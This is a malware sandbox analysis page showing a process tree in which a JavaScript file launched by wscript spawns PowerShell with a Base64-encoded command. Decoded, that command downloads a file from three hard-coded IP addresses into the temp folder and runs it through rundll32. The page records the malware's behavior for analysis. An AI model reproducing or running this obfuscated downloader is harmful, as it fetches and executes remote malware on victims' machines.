popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Oar.js

    3064

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQAcwB1AHAAcAByAGUAcwBzAGkAbwBuAHMASQBtAHAAZQBjAGMAdQBuAGkAbwB1AHMAIAA9ACAAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADIALgA4ADYALgAxADIAMQAuADEAOQA2AC8AMQBkAEwASAAvADEAMwBMAGoAdgBrAEkAbwAsAGgAdAB0AHAAOgAvAC8AMgAwADkALgA5ADcALgAxADUAOAAuADEAMAA0AC8ARwBkAEwAVABaAFEALwBFAHIAagB6AGEAeQB1AEoALABoAHQAdABwADoALwAvADQANQAuADUANQAuADMAOAAuADEANQA2AC8AZwBVAEsAbwBWAHMASwAvAGYAagBZAEEAbQBMAEwAIgApAC4AcwBwAGwAaQB0ACgAIgAsACIAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVAB1AGMAawBlAHIAcwAgAGkAbgAgACQAcwB1AHAAcAByAGUAcwBzAGkAbwBuAHMASQBtAHAAZQBjAGMAdQBuAGkAbwB1AHMAKQAgAHsAdAByAHkAIAB7AHcAZwBlAHQAIAAkAFQAdQBjAGsAZQByAHMAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADgAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAHUAbgBwAGUAYQBjAGUAZgB1AGwAbgBlAHMAcwBSAGUAYwBlAGkAcAB0AGEAYgBsAGUALgB2AGkAYgByAGkAbwBuAE0AbwBuAHQAZwBvAGwAZgBpAGUAcgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAHUAbgBwAGUAYQBjAGUAZgB1AGwAbgBlAHMAcwBSAGUAYwBlAGkAcAB0AGEAYgBsAGUALgB2AGkAYgByAGkAbwBuAE0AbwBuAHQAZwBvAGwAZgBpAGUAcgApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAUQBBAFIAUQBCAE4AQQBGAEEAQQBYAEEAQgAxAEEARwA0AEEAYwBBAEIAbABBAEcARQBBAFkAdwBCAGwAQQBHAFkAQQBkAFEAQgBzAEEARwA0AEEAWgBRAEIAegBBAEgATQBBAFUAZwBCAGwAQQBHAE0AQQBaAFEAQgBwAEEASABBAEEAZABBAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDADQAQQBkAGcAQgBwAEEARwBJAEEAYwBnAEIAcABBAEcAOABBAGIAZwBCAE4AQQBHADgAQQBiAGcAQgAwAEEARwBjAEEAYgB3AEIAcwBBAEcAWQBBAGEAUQBCAGwAQQBIAEkAQQBMAEEAQgBVAEEARwBrAEEAYgBRAEIAbABBAEQAcwBBACIAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADsAfQB9AA=="

      2228

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf